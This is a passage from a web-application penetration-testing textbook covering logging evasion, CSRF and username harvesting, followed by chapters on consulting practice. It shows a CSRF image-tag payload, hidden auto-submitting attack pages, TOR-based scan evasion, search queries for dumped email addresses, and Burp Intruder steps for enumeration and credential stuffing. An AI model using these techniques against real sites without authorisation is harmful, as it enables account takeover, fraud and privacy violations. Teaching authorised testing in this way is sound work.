Figure 11.9 Reviewing cached content.


We can see from these cached results several familiar references such as the
one to "/wp-content/uploads" indicating WordPress as the CMS. Using this
same HTML source code and searching for "generator" can reveal the version
of software being used. Adding to the previous example of TOR, this request
and subsequent scanning using WPScan need not be made from our real
IP address. WPScan, like the other tools mentioned in this chapter, also
supports evasion, and has made it easy for the user to invoke with a single
OWASP A10:2017 Insucient Logging and Monitoring 177

command line switch of "stealthy". However, by using the aforementioned


proxy and TOR conguration with the proxy option in WPScan, we can
now perform a mostly anonymized scan for WordPress vulnerabilities. We
can see the invocation process for TOR in Figure 11.10.

Figure 11.10 Invoking TOR.


Alternatively we could simply obtain the version number, go to wordpress.org,
download the same version from archives, and perform oine analysis of the
software at our leisure. Continuing in this manner we could then attack the
true target of our penetration test using a vetted custom exploit with a high
likelihood of evading detection.

Link to hands-on portion: https://tptgtwa.com/owasp10


Root Cause and Conclusion: Testing for OWASP 10 does not typically
require anything special in terms of our methodology. What is important is
communication with our client or the business we are conducting the pene-
tration test for as it pertains to the rules of engagement. We need to make it
clear that in order to test for OWASP 10, it will be a coordinated eort as
we will need evidence that our attacks were logged and triggered alerts which
were responded to in some fashion. If available, we can include the evidence
in the nal report, and if a suitable security control for OWASP 10 does not
exist then we need to recognize this as a nding.
Between credential stung and injection, we can easily send hundreds of
thousands of requests at a given target and in the event this does not raise
alarms, this is indicative of a signicant shortcoming. It is our job to identify
this aw and make sure the business is aware of the risk, as it is dicult to de-
fend against what you can't detect. From networking and security devices all
the way down the stack to the application itself there are logging capabilities.
Creating and conguring these devices and applications to consistently send
178 The Penetration Tester's Guide to Web Applications

security-relevant logs to a centrally managed and adequately tuned event cor-


relation system is challenging for many organizations. This results in blind
spots in enterprise detection capabilities and reduces the eectiveness of the
SOC.
Even with a robust SIEM and well-trained sta we can still attempt to
bypass the lters designed to detect our malicious trac using evasion tech-
niques built into some of our tools. In the event the target application is
running well-known software we can mimic that same software in our own
test environment, and attack this implementation in a controlled manner to
tune our attacks prior to targeting the live system. Leveraging OSINT, TOR,
and wielding our tools like a professional raises the bar for enterprise defend-
ers, and can often lead to our attacks evading detection or not triggering
actionable alerts.
Chapter 12

Beyond the OWASP Top 10


Denition: The list of OWASP's top ten most critical web application se-
curity risks is a living document in that it evolves over time, and is typically
updated every three to four years to reect what we see in the industry. How-
ever, our ability to attack web applications does not end with the OWASP
top ten, nor is this the full list of what we should try to identify and exploit.

Details: This chapter will focus on two specic vulnerabilities: Cross Site
Request Forgery (XSRF or CSRF) and username harvesting (or account enu-
meration). While XSRF is no longer on the OWASP top ten list it is still
a prevalent vulnerability and worth our time discussing as, when exploited,
it can lead to serious impact. Username harvesting is a subset of broken
authentication and, in addition to being extremely prevalent, requires more
discussion as it too can lead to signicant user impact.
XSRF is an attack which takes advantage of the trust an application has
in an established session. Reread the last sentence and absorb the depth of
what it means. When we authenticate to a web application via basic, digest,
integrated or forms-based authentication using two-factor, oAuth, federated
identify we are proving we are who we say we are, and in turn being au-
thorized to make subsequent requests with the level of privilege assigned to
our account. We have successful authentication and in turn, established our
session. After authenticating, most applications don't require any additional
checks or conrmation of our identify regardless of what we request or what
transactions we submit. This is the inherent trust the application has given to
our established session. What XSRF does is takes advantage of that trust by

179
180 The Penetration Tester's Guide to Web Applications

tricking a user into submitting a transaction they did not intend to request.
This victim - attacker - vulnerable web application relationship is reminiscent
of XSS, but that is where the similarities begin and end.
The root cause of XSRF is a lack of transaction validation on the part
of the web application; specically, the application does not verify the user
intended to make the request and blindly honors any requests made from
an authenticated user. If the user's level of authorization is sucient for the
request being made, then it is honored. The XSRF attack in turn, instructs
the victim to make a request on behalf of the attacker, and since the request
originates (from the perspective of the application) from the authenticated
user (the victim), the application handles the request as if nothing is amiss.
Several things are required in order for this attack to work: predictable
parameters, a suitable payload, targeting a victim currently logged into the
vulnerable application, proper timing, and a risky transaction. When the
GET or POST parameters for a transaction remain static over time and a
random or unpredictable cryptographic nonce is not included in the request,
these are what are referred to as predictable parameters. This literally means,
for example, the "username" parameter is always called "username" and
the password parameter is always called "password" and so on. However,
the values for each parameter are of course free for us to change. A typical
example of XSRF would be a GET request making a banking transfer from
one user's account to another user's account; when this request is invoked
by the legitimate user we see it as just regular functionality, but when the
legitimate user is tricked into making this request and the application accepts
it, this is an example of XSRF. For this to work, we as the attacker must rst
understand what a valid GET request looks like, which means us performing
reconnaissance on the target web application, commonly with our own test
account. We proceed to leverage our browser and proxy to make the request
and view the details, respectively. The request we make is the basis of our
attack/payload; we merely need to alter the request to ensure money ows
from the account of our choice to the account of our choice. The important
thing to keep in mind is that the victim user will be making the request for
us; a request which we control entirely.
The idea of moving money maliciously is a good basis for an example and
at its crux it represents a risky transaction. If we send someone an email with
a link to a Google search and the user clicks the link, this user will be the one
making the Google search request even though we dened the details of the
search, the query string. This is not XSRF because it is failing to meet two
of the requirements: The user does not need to be authenticated to perform
Beyond the OWASP Top 10 181

this request and there is nothing inherently risky about submitting a search
request (in most cases). The reason why the victim needs to be logged in
to the application is because once authenticated, a user has the ability to
take actions with their level of privilege. This could mean updating their
password, making a nancial transaction, adding a rewall rule, creating a
new user or anything that we would classify as risky. Another important
note is that while the example mentions a GET request, we can just as easily
conduct a XSRF attack via a POST request.
Once we get to the point where we have identied the details of a risky
transaction and conrmed it is vulnerable to XSRF, the next step is to craft
our payload and host it somewhere or send it directly to the target victim.
If the vulnerable transaction is a GET request, we could simply craft the
suitable GET string and email it to the victim. If the victim were logged into
her account at the time of receiving the email and clicking the link in the
email, then our attack would likely work. This style of attack however would
certainly not be stealthy as the victim would be directed to the vulnerable
page in her browser and see the results of the request (and likely become
quite suspicious). An alternative way to get the victim to submit the request
would be to host the GET request on a website via an HTML image tag <img
src="https://example.com/attackparameters /> and email the victim a link
to this website. The image would not display (as it is not a valid image),
but the victim's browser would parse the HTML image tag and make the
request to example.com with the appended attack parameters. If we are able
to get the victim to browse to our attacker-controlled website, we can of
course launch other attacks against the user, but what makes XSRF special
is that it doesn't break same origin policy (SOP) yet it impacts a completely
separate domain. The reason why SOP is not being broken is because the
source of the request, from the perspective of the vulnerable application, is
the victim's browser and not our malicious website hosting the image link
or JavaScript. Mentioning JavaScript is relevant because we can use it to
automatically submit a XSRF POST request unbeknownst to the victim as
soon as he browses to our malicious website.
If our payload delivery is via a malicious string in email or hoping a victim
will browse to our website, how are we to know if the attack is successful?
XSRF is actually a blind attack in the sense that we don't immediately know
if it was successful. We can certainly monitor our server logs and see when
a victim browses to our site, but we have no visibility into the transaction
request sent to the vulnerable web application, and no indicator as to whether
the victim is even currently logged into the vulnerable web application at the
182 The Penetration Tester's Guide to Web Applications

time of our attack. We can verify the attack worked by checking for the
intended result of our attack, be that a new user account being added, or a
money being sent to our bank account. While XSRF can be a powerful attack,
there are several limiting factors which expedited its removal from the top
ten list, such as the ease of implementing automated defense mechanisms
and, of course, the complexities involved with launching a successful attack.
Even with this, XSRF still remains a common vulnerability. However, an
even more common vulnerability is username harvesting.
Username harvesting, also referred to as account enumeration, is an attack
which allows us to automate the harvesting of valid (currently registered or
otherwise in-use) web application accounts; specically, account usernames.
Not only is this attack very easy to perform in most situations but it is also
very easy to identify as a aw. A common way to discover username harvest-
ing vulnerabilities is to submit an invalid username to the login, password
reset, and account creation components of the application, and observe how
the application responds. We take the exact same actions only this time we
use a valid username, and note the dierences in how the application responds
to us submitting a valid versus an invalid username. Once again, valid means
the account/username exists in the databases whereas an invalid username
still meets the requirements of a username, but has not been registered as a
user account.
This approach is predicated upon the idea that we know what at least
one valid and one invalid username is. We can have a high level of con-
dence that a username comprised of 15+ gibberish characters is probably
not valid. Conversely jsmith, [email protected], kjohnson, and other appro-
priately (depending on the context of the application) common usernames
are good starting points for testing how the application responds to a valid
username.
In modern, convenient, and user-friendly web applications, it is extremely
challenging to allow a user to create their own account or reset their password
and not be vulnerable to username harvesting. This is because the developer
and business are choosing convenience over security, meaning it is more con-
venient to clearly tell their users when a username has already been taken
rather than show a generic error message to avoid the vulnerability. Merely
communicating to the user/attacker when an account name has already been
registered is the vulnerability. Our job as attackers is to automate the guess-
ing and conrmation of a large quantity of valid usernames, and proceed
to launch additional attacks against the user accounts once armed with this
knowledge.
Beyond the OWASP Top 10 183

To reiterate the aw for clarity, image the account creation process for
gmail or any other public webmail service. When creating a new gmail ac-
count, we are presented with an account creation page which includes an
input for us to choose our desired username. Since the username will become
our email address, and each user's email address has to be unique, gmail will
not let us choose an email address which already exists. If we try to do so,
the website will clearly communicate that our desired username has already
been taken, and we must choose another one. This notication is the aw,
and we can leverage it as the indicator that a given username is valid. To
further attack the system however, we need to automate the request process
and response parsing, meaning submitting email addresses and extracting the
error message or response code to determine if an email address is currently
in use or not.
In addition to the account creation page, we want to focus on password
reset pages and login pages; anywhere the application has to make a logical
determination as to whether an account exists including authenticated pages.
Launching the attack is typically best carried out by our interception proxy,
Burp's intruder, or ZAP's fuzzer. This is because we can prime these tools
with the appropriate request, and then grep/nd the verbiage or response
code indicator in the resulting HTTP response, which we will use to make
note of the requested username being valid or invalid. The goal is to auto-
mate the attack and gather valid usernames. With a large quantity of valid
usernames, we can proceed to launch credential stung or phishing attacks.
Malicious attackers could use this same list of valid usernames to launch a
DOS attack eectively locking out all of the users by scripting multiple failed
login attempts if the application supports account lockout.

Real-World Dialog: The "Real-World Dialog" section in the previous chap-


ter provided insight into a username harvesting vulnerability leading to re-
mote access into the organization, so for this section the focus will be on
XSRF. XSRF was not included in the top ten list when OWASP nally re-
leased the updated 2017 version, however, I did identify the aw years later
on a production PCI application. Just because it's no longer prevalent doesn't
mean we should not test for it. One of the features of the PCI application
allowed users to submit credit card details in order to schedule one-time or re-
curring payments. For an authenticated and legitimate user this was valid and
useful functionality, but for an attacker this was the type of form we would
want to try and attack. As the web application penetration test commenced
and while using a provisioned test account, I proceeded to execute various
184 The Penetration Tester's Guide to Web Applications

injection attacks on the form's input elds which proved to be fruitless, and
eventually turned my attention to XSRF. In reviewing the applicable post
request, I was able to determine there were no apparent XSRF protection
mechanisms in place, so using Burp's XSRF PoC functionality I generated
an attack form and proceeded to validate the vulnerability. Attacking users
of the application was not in-scope for this test, but the risk seemed clear,
the nding was valid and clearly communicated in the report to the client.
Less than 48 hours had elapsed since the report was shared with the client,
and they had already implemented a x in their production application.
They requested I retest the nding; since the report was to be used in their
PCI audit, all high-risk and medium-risk ndings were likely going to be
addressed. I logged back into my test account for the application and, with
Burp passively watching my requests, I noticed they had implemented an
anti-XSRF mechanism based on the aptly named custom parameter "anti-
xsrf-token". Upon logging out and back in, and refreshing the page, I could
see the randomness of the parameter's value seemed to be adequate as was
its length; at rst blush they seemed to have implemented a solid x. When
generating another PoC, however, I decided to simply remove the value of
the token and resubmit the request. The attack worked!
The client did a great job of setting the token, but failed to actually
check that the same token (or any token) was sent back with the transaction
request.

How to Exploit: We'll explore how to exploit username harvesting rst,


building o of the details previously discussed. When presented with a mod-
ern, user-friendly web application, one of the rst places to look for this aw
is on the account registration page. If the application allows us to create our
own username, then we simply need to attempt to register a common user-
name or create an account and then attempt to create another account with
the same username. Our goal is to understand how the application responds
when we attempt to create a duplicate account. On login and password reset
pages the same logic applies.
The rst step is to identify the indicator: We need to focus on what
verbiage is communicated or what response is provided when a previously
registered username is submitted. Once we obtain this indicator, we proceed
to automate the attack. To begin the attack, we start with a list of valid
usernames. It is very common for usernames to be email addresses or meet a
set of requirements such as length. If the application provides a registration
page, we can either look for guidance or clarity on what constitutes a valid
Beyond the OWASP Top 10 185

username or simply attempt to create a very short/unacceptable username


to see what error message the application will provide. For instance, special
characters or numbers may not be allowed as part of the username; we want
to invoke an error message so we can learn the requirements. In this fashion
we can ensure when we work to produce a list of usernames, they will not be
immediately rejected based on a failure to meet the specications of the web
application. An example is shown in Figure 12.1.

Figure 12.1 Example website showing username requirements.

If our target application usernames are based on email addresses then we


want to devise a list based completely on valid email addresses. Gmail is a
very popular free webmail service and despite being breached multiple times,
Yahoo addresses also remain in use. It is not uncommon to see AOL addresses
from time to time. There are many dierent free webmail services we can
utilize as the domain for email addresses as well as private and company-
based email domains. Based on our reconnaissance and OSINT we should
have an idea of what type of users (the target audience) interact with the
target web application, and based on this, we can try to focus on certain
domains for our email address username list creation.
The three primary ways of devising a list of valid email addresses for this
purpose are: obtaining a dump of compromised/disclosed addresses, targeting
webmail providers with a username harvesting attack, and nally, creating
our own list using some custom tools. The rst option is fair game, the
second option is likely out of scope, and the nal option will be explored in
greater detail. Obtaining a dump of valid email addresses can be achieved
with a single well-formatted search query which we can see in Figure 12.2
and Figure 12.3.
186 The Penetration Tester's Guide to Web Applications

Figure 12.2 Search engine query to produce email address dumps.

Figure 12.3 Search engine query results showing more than we asked for.

Exploring the method of using some custom tools to create our own list will
be useful for both creating usernames based on email addresses, and general
usernames. A logical place to start is the U.S. Census as shown in Figure
12.4.

Figure 12.4 A U.S. Census page providing links to popular surnames. Helpful indeed.

Downloading and unzipping the ZIP provides access to CVS and XLSX les,
and viewing the CSV shows the 162,253 most common names in an easy-to-
digest format. We can see the output of the le download in Figure 12.5.
Beyond the OWASP Top 10 187

Figure 12.5 CSV results showing several popular surnames.


To grab the rst column, the column showing the name, on the Linux CLI a
command of cat InputFile | cut -d ',' -f1 | sort -u  OutPutFile will suce
after we manually delete the rst and last lines. With this output we can
proceed to prepend one letter in front of each surname to produce a list of
potentially valid usernames in the format of rst initial, last name. We don't
need to modify the email addresses in this manner, but once again using
a bash script to selectively grab just the email address from the input le
is desirable in order to create a list of usernames based on email addresses.
Prepending one letter to each surname is accomplished with another oneliner,
which we can see in Figure 12.6.

Figure 12.6 A bash for loop producing perfectly formatted usernames.


Basic math tells us that using an input list of 162,253 surnames from the
2010 Census multiplied by 26 will result in over 4.2 million usernames, which
is potentially overkill for our purposes. In addition, the resulting le (User-
Names) is 37MB in size which is large enough to perhaps cause some issues
when importing into our Proxy tool or script. We will proceed to use a short-
ened version of this list to identify valid web application usernames, and will
cover examples of this in the next section, but for now we need to turn our
attention back to XSRF.
Exploitation of XSRF is signicantly more complex, but identifying it is
not. The rst thing we need to do in order to identify XSRF is to determine
which requests/what functionality the application has which could be con-
sidered high risk. We then can simply leverage the built-in XSRF features of
188 The Penetration Tester's Guide to Web Applications

Burp (In the Pro version) or ZAP to create a XSRF PoC and test the ap-
plication to determine its susceptibility. Most transactions or requests that
have to do with account provisioning, modication, deletion, passwords, -
nancial transactions, PII, PCI, and the like are candidates for being classied
as risky. However, we do need to take into account the context of the aw;
for instance, if the application doesn't protect against XSRF attacks for a re-
quest to POST to a blog, what is the risk? If we can couple the XSRF attack
with a POST request containing PII or sensitive information or even scripts
then arguably this might be a high risk nding. In other words, leveraging
XSRF to attack an application with a stored XSS string is likely a high risk.
Once browsing the application with our interception proxy running in
tandem, we want to submit the request like a normal user would (this requires
a test or compromised account) and then from within ZAP, right-click the
request and select "Generate Anti-CSRF Test FORM", as we can see in
Figure 12.7.

Figure 12.7 ZAP's interface allowing a CSRF PoC based on a POST request.

Doing this will result in a very basic HTML page with a single submit button.
When we click the submit button the exact same request we just submitted
will be submitted again. The dierence is we can and should alter the input
values to dene the values we desire; for instance, moving money from one
account to another or submitting a rewall rule. ZAP's generated PoC code
will serve as the attack framework we will ultimately get our victim to submit
for us and while it is basic, it need not be any more complex as it will be
hidden on a dierent page and ideally automatically submit without the
victim ever seeing it. An example of the PoC code is shown in Figure 12.8.
Beyond the OWASP Top 10 189

Figure 12.8 ZAP's XSRF PoC in raw HTML form.

With this knowledge, let's explore some examples of both username harvest-
ing and XSRF.

Examples: Continuing with the XSRF attack, we need to host the payload
somewhere as it is a POST request, and can't be sent to the victim as easily
as a GET request. With the same idea in mind though, sending our victim
something requiring their interaction, we can send the victim a link to a
website we control. The goal would be to have the victim click the link, con-
ceivably in an email, and be directed to our website, which will be hosting
the XSRF attack and payload. Once again, identifying a XSRF vulnerability
is not overly challenging, nor is creating a suitable payload and even getting
our victim to click on a link. What can be dicult, however, is timing the
attack to coincide with a moment in time (and in the same default browser)
when the victim is logged into the vulnerable application. This is the nal
piece to the attack; the victim has to be actively logged into the application
we are attacking in order for our attack to be carried out. In a Windows
AD environment where the application we are attacking has implemented
windows pass-through authentication, XSRF is ideal as there is a high prob-
ability the user is always logged in. In other web-based applications this is
not always the case. There are some situations where we will have knowl-
edge of ideal times to launch our targeted XSRF attack, and other situations
where we need to send the attack and hope for the best, or continually host
it and indiscriminately attack users (depending on our goals). We will pro-
ceed to setup the landing/attack page without regard to the latter, as it will
be congured the same in either case. A seemingly harmless looking website
(Figure 12.9) can be used as the front-end for the XSRF attack.
190 The Penetration Tester's Guide to Web Applications

Figure 12.9 Harmless looking website hosting XSRF attack.

However, viewing the HTML source code of the page reveals our attack, which
is essentially the PoC from ZAP with a slight modication. Other than incor-
porating a theme and design into the HTML, we have also added JavaScript,
which is responsible for automatically submitting the POST request to the
vulnerable application as soon as the page nishes loading. By creating the
website in this manner, the victim is presented with what appears to be a
benign website while in the background our malicious code instructs the vic-
tim's browser to make the POST request of our choosing. We can see the
source code in Figure 12.10.

Figure 12.10 HTML and JavaScript used to submit the POST request.

The caveat to this method of payload delivery is that the victim's browser
will be directed to the vulnerable application upon submitting the POST
request. By adding more code to open a new tab, submitting the request
from that tab, and then closing the tab or other such concepts (possibly), we
could potentially make the attack more clandestine. Another option would
Beyond the OWASP Top 10 191

be to implement the POST request as a GET request, and include an HTML


image tag to automatically submit the request. If GET requests are accepted
this method would not only work, but also be carried out without the victim's
knowledge. Figure 12.11 shows an example of how this could be executed.

Figure 12.11 Launching a XSRF attack via a GET request and hiding any broken
image icon.
These methods work well for executing the XSRF attack in dierent circum-
stances, and can be modied to meet the needs of the attacker. Let's again
refocus our attention on some examples of exploiting username harvesting.
Recall that the goal of a username harvesting attack is to identify, with
condence in an automated way, valid application accounts. Ultimately we
will try a credential stung attack, but initially we are not trying to login
to any of the accounts. In practice most businesses (and by extension, web
applications) choose to communicate to end users when a provided username
is incorrect, and we need to be able to identify and extract this message from
the HTTP response to our login, account creation, forgotten password, or
other suitable request. Several examples of this behavior are shown in Figure
12.12.

Figure 12.12 Common error messages conrming the username is valid.


192 The Penetration Tester's Guide to Web Applications

In looking at the error messages the verbiage is clear and we can use this to
conrm a submitted username is valid. Using Burp and our browser, we will
navigate to our target application, proceed to make an initial account cre-
ation request, and view the resulting HTML. Next, we will send the previous
request to Intruder, choose the "Sniper" attack, and populate the payloads
tab with a single set of usernames. The usernames should be provided in
the format of one username per line in the le. Looking more closely at the
initial Sniper attack, we need to clear all of the predened injection points,
and choose the one single point where the submitted username resides as
this single parameter value is where we need to focus the attack. We can see
this in Figure 12.13 whereas Figure 12.14 will show the options of applicable
payloads.

Figure 12.13 Using Burp's Sniper option within Intruder.

Figure 12.14 Uploading our le containing usernames to Burp's payload section.

Once we properly choose the injection point and successfully input the list
of usernames we want to test, we proceed to the "Options" tab to setup a
"Grep - Match" rule which will serve as our indicator of a valid username.
We leverage the error message previously discovered, and populate the rule
with this string as long as it is unique and will only be displayed when a valid
username is submitted. Using the string "Choose a dierent address" should
suce for this example, as we can see in Figure 12.15.
Beyond the OWASP Top 10 193

Figure 12.15 Using Burp's Grep - Match option to server as an indicator of success.

Next we launch the attack by clicking "Start Attack" in the top right-hand
corner of any intruder tab. The results of the attack are shown in Figure
12.16.

Figure 12.16 Viewing results of the Intruder attack noting valid usernames.

Note the free version of Burp does not allow us to save the results, congure
granular timing for the attack, and it throttles our requests; all of these rea-
sons make using the free version almost useless in a professional engagement
but adequate for testing. We could easily reproduce this attack with a custom
script or ZAP, but we do want to have a way to save the results so we have
a denitive list of valid usernames.
Depending on the verbiage to grep for, the format of the usernames and
the like, the complexity of getting the attack to work will be inuenced
heavily by the way the web application has been implemented. While there
are not usually specic security features aimed at preventing this attack, we
will at times have to contend with session timeouts, cookie reuse issues, and
excessive request ltering protections which will slow down our attack, but
not stop it. The next logical course of action, once we have a quantity of valid
usernames, is to proceed with a credentials stung attack which works the
same way as the username harvesting attack in principal, the only dierences
being using two sets of payloads and a dierent attack type: Valid usernames,
password guesses, and a "cluster bomb" Intruder attack type. In addition,
depending on the rules of engagement and needs of the business, we can
194 The Penetration Tester's Guide to Web Applications

leverage our vast quantity of usernames to launch spear phishing attacks and
in rarer circumstances perhaps lockout user accounts.

Link to hands-on portion: https://tptgtwa.com/owaspbeyond


Root Cause and Conclusion: The root cause of XSRF is a lack of trans-
action validation. Modern development frameworks now support this func-
tionality, and implementing proper protections is not exceedingly challeng-
ing  even adding the "SameSite" ag to cookies would help remediate this
aw. Adding a ag to a cookie and enabling framework security options
alone, however, don't solve the problem completely and consistently nor are
they routinely implemented. For these reasons XSRF is a prominent nd-
ing on many tests. However, XSRF can be dicult to successfully exploit
in a consistent manner as it requires end-user interaction and proper autho-
rization/permissions associated with the victim's account as well as proper
timing. We always want to test for this aw and when we are allowed and
able to exploit it, XSRF can lead to signicant impact.
Username harvesting aws commonly go without being remediated and
the nding is either disputed as not a risk or accepted as part of business
operations. Our risk ranking for this nding, like other ndings, needs to be
context-based and commensurate with the proven level of risk it poses to the
business and its users. The reason this nding is so prevalent is because it is
exceedingly challenging to create a user-friendly application and not clearly
convey when a user account has already been taken (during the account cre-
ation process) or, in some cases, tell the user why their login/password reset
request is failing. While this is a security shortcoming, organizations typi-
cally choose to leave the aw in place rather than risk alienating or otherwise
annoying users. The problem with this approach (which is good for us) is
that protecting accounts and access to the application is only as good as the
combined strength of user and application controls. If the application only
allows for eight-character passwords for instance, how can a user ever hope
to have a strong password? Likewise, if the application does not enforce two-
factor authentication and/or complex passwords, there are always going to
be users which choose weak credentials. This is why OWASP #2 is where it
is on the list and why attacks like username harvesting can be a high-risk
issue.
Chapter 13

Testing as a Consultant and


Adding Value
Working in-house as a penetration tester has certain advantages over consult-
ing, but we want to approach every engagement as if we are a consultant to
maintain a high level of professionalism and not miss details. In this capacity,
we treat every business/engagement like a client/contract.
The way we approach a penetration test should be the same regardless
of the client and consists of several important elements: scoping, rules of
engagement, expectations. Within each of the elements we delve into more
granular components.
The purpose of scoping is to make sure we are testing what the client needs
to have tested, but it is also our responsibility to ensure that what is required
to be tested encompasses all relevant aspects of the application. This could
mean taking into account subdomains and aliated services/APIs as part of
the extended scope of testing. In addition, it is important to discuss with the
client the very real possibility of causing harm to the web application either
via a degradation of service, potential DoS, and corrupting data. We want to
make sure these points are clearly communicated, and that the client takes
the appropriate actions to backup data before testing ensues. When speaking
with the client, one of the most important questions to ask is, "What are the
goals of testing"? A good answer to this question can help guide our eorts in
what we test and how we go about trying to gain access to the most critical
information, and this will vary signicantly from engagement to engagement.

195
196 The Penetration Tester's Guide to Web Applications

The rules of engagement are essentially the guiding protocols to help us


focus our eorts on the right areas of testing, and to ensure we don't target
systems which are not in-scope. Thus, conversations about scoping and how
we engage the client are similar in nature and both are discussed during a
kick-o call prior to testing. As part of the conversation around the rules of
engagement, we want to verify our primary and secondary points of contact
(who do we call in the event the website becomes unresponsive). Agreeing
on a regular cadence of communications is also advisable, where we let the
client know when testing is starting, and when we are nished for the day.
We also need to determine what times of the day/week we are going to be
testing the web application as well as if client-side attacks are in-scope, as
well as social engineering.
Setting expectations with the client is one of the most important aspects
of the entire engagement as what we think constitutes a great test may not be
what the client had in mind. For this reason, we want to be clear in our actions
and communicate what we are going to do, how we are going to do it, what
the deliverable is going to include, and execute on the agreed course of action.
Extra care needs to be taken if the client or the application has never dealt
with a penetration test in the past. There is a signicant dierence between
running an automated scanning tool and performing a manual inspection of
security controls with a mindset focused on bypassing these controls, and
forcefully gaining access to resources and information. Because of this, while
the application may undergo regular scanning, we need to help the client
understand the risks associated with testing as well as the approach, goals,
and benets.
Consider the next step in the progression of: engaging a client, conducing
the kick-o call (discussing all of the aforementioned topics), and proceeding
to conduct the test to completion. Finally, we move on to writing the report.
In many ways the deliverable, the nal report, is the most important ele-
ment of a penetration test. Setting expectations is very important; providing
a tangible document including all of our hard work, ndings, and details on
exploitation, however, is the lasting impression we leave with the client. For
this reason (and know that this report will be shared internally and scruti-
nized by our peers including other penetration testers, auditors, management,
and executives) we want to make sure our report is the best it can be. The
elements which comprise an excellent report are an easy-to-understand ex-
ecutive summary, detailed narrative about what was done, and how it was
accomplished as well as detailed and reproducible ndings with screenshots,
clear descriptions of each aw with risk ranking, and recommended remedia-
Testing as a Consultant and Adding Value 197

tions. The report also needs to include conrmation of the scope of targets, a
robust description of the methodology used to test, a table of contents, and
information regarding the testing dates, points of contact, and an appendix
with automated scan results and other applicable documentation.
While this has been discussed intermittently throughout the book, know
that every nding is context-specic and assigning default CVSS scores and
risk ratings to ndings is not sucient. We need to take into account the
demonstrated risk of the identied aw and produce a custom risk score
for each vulnerability we nd regardless of exploitation. One nal note on
the deliverable of the report: Prior to sending, discuss how the report is
to be delivered (encrypted, GPG, shared via the cloud, emailed). We don't
want detailed paths to exploitation of the client environment to be shared
unencrypted.
Adding value as an in-house penetration tester involves knowing our en-
vironment and establishing relationships with other teams. In fact, these are
the two main advantages in-house penetration testers have over outside con-
sultants. We want to maximize the benets of knowing what protections are
in place, how code is deployed, what servers are running which software,
where PII resides, and the like to, in eect, conduct a white box penetration
test focusing on what we already know to be the weakest links.
The other benet and way we can add value in-house is by talking to
our counterparts on the development team, our security champions, or like-
minded security conscious developers. Ideally, we want to work together to
address security shortcomings, but also to ensure a smooth test and to stay
abreast of new software being released, new technology being researched, and
timelines for incorporating xes into the codebase. In a DevSecOps environ-
ment we can also ensure our automated scanning and other security processes
are taking place, providing value and constantly being tuned to the appli-
cations in the pipeline. This concept of providing value is a nod to the fact
that security is a cost center and one of our main functions of this cost center
is to help reduce risk and keep costs lower by reducing threats, attack sur-
face, and ultimately preventing a breach or similar unwanted consequences.
We can work to accomplish these goals by gaining a deep understanding of
the environment and constraints of the business. With this knowledge we can
proceed to recommend the best course of action to protect the business. From
a consultant perspective we add value by being easy to work with, meeting
expectations, and delivering a thorough, high-quality penetration test and
accompanying report. Although a requirement, there is more to penetration
testing than technical acumen and as the human behind the tools, we are
198 The Penetration Tester's Guide to Web Applications

in the best position to provide value when we have a deep understanding


of vulnerabilities, how to exploit them, and how to do so in a professional
manner.
The last brief topic to discuss is that of professionalism and ethical test-
ing. As mentioned, reading this book will not make you an expert, but cou-
pled with persistent practice, applying the concepts, and honing the tech-
niques/tools will eventually lead to mastery. When this occurs, you will be,
in the .00001% of people with this skill set. I think the Linux Sudoer's message
does a good job of setting the expectation of how to act, how to responsibly
wield this knowledge, and how to keep us professionals dierentiated from
attackers: Respect the privacy of others. Think before you type. With great
power comes great responsibility.
I hope you enjoyed the book!
About the Author
Serge Borso is the founder and CEO of SpyderSec, an information security
consulting organization specializing in penetration testing, security awareness
training, and OSINT. He is also the president of the Denver OWASP chapter,
which is among the largest chapters in the world.
He is an expert in a variety of information security elds, having served in
many roles in the IT and security industries over the past fteen years. As an
active member in the security community, Serge has trained over one thou-
sand students at various public/private training events, presents regularly
at speaking engagements, and his quotes can be read in numerous industry
publications. Serge holds a B.S. in IT, an M.S. in computer science from Col-
orado Technical University, has numerous industry certications, and also is
an instructor with the SANS Institute.

199
Index

API, 6, 22, 62, 72, 73, 75, 78, 92, Nikto, 155158, 174
95, 119 nmap, 102, 109, 167, 172
NoSQL Injection, 22
Black Box, 6, 146
Burp Suite, ix, 17, 21, 32, 36, 39,
60, 81, 116, 129, 140, PCI, 5, 7, 11, 35, 45, 183, 184, 188
143, 175, 192, 193 Programming Languages, 32, 77,
126, 130, 133, 144
Command Injection, 28
Cookies, 7, 32, 39, 89, 122, 125, Rules of Engagement, 5, 7, 44,
126, 131133, 175, 194 122, 168, 170, 196
Cracking, 4749, 94
Credential Stung, 35, 39, 110, SQL Injection, 9, 10, 12, 15, 17,
168, 177, 191 19
Denial of Service, 2, 75 sqlmap, 19
Deserialization, 137139, 143,
147, 148 WAF, 3, 5, 7, 35, 62, 99, 153, 170,
171, 173
Google Dorks, 82, 84, 107, 114,
186
XSRF, 121, 179181, 183, 187,
HIPAA, 5 189, 194
HITRUST, 5 XSS, 107, 119, 121, 123, 126, 131,
HSTS, 44, 45, 49, 53 136, 159
XXE, 55, 58, 59, 62, 68, 72, 76,
JWT, 90, 92, 94 139
Logging and Monitoring, 167,
168, 170, 177 ZAP, ix, 63, 65, 67, 70, 88, 92

201
Recent Titles in the Artech House
Computer Security Series
Rolf Oppliger, Series Editor

Bluetooth Security, Christian Gehrmann, Joakim Persson, and


Ben Smeets
Computer Forensics and Privacy, Michael A. Caloyannides
Computer and Intrusion Forensics, George Mohay, et al.
Contemporary Cryptography, Second Edition, Rolf Oppliger
Cryptography for Security and Privacy in Cloud Computing,
Stefan Rass and Daniel Slamanig
Defense and Detection Strategies Against Internet Worms,
Jose Nazario
Demystifying the IPsec Puzzle, Sheila Frankel
Developing Secure Distributed Systems with CORBA, Ulrich Lang and
Rudolf Schreiner
Electric Payment Systems for E-Commerce, Second Edition,
Donal O'Mahony, Michael Peirce, and Hitesh Tewari
Engineering Safe and Secure Software Systems, C. Warren Axelrod
Evaluating Agile Software Development: Methods for Your
Organization, Alan S. Koch
Implementing Electronic Card Payment Systems, Cristian Radu
Implementing the ISO/IEC 27001 Information Security Management
System Standard, Edward Humphreys
Implementing Security for ATM Networks, Thomas Tarman and
Edward Witzke
Information Hiding, Stefan Katzenbeisser and
Fabien Petitcolas, editors
Internet and Intranet Security, Second Edition, Rolf Oppliger
Introduction to Identity-Based Encryption, Luther Martin
Java Card for E-Payment Applications, Vesna Hassler,
Martin Manninger, Mikail Gordeev, and Christoph Müller
Multicast and Group Security, Thomas Hardjono and
Lakshminath R. Dondeti
Non-repudiation in Electronic Commerce, Jianying Zhou
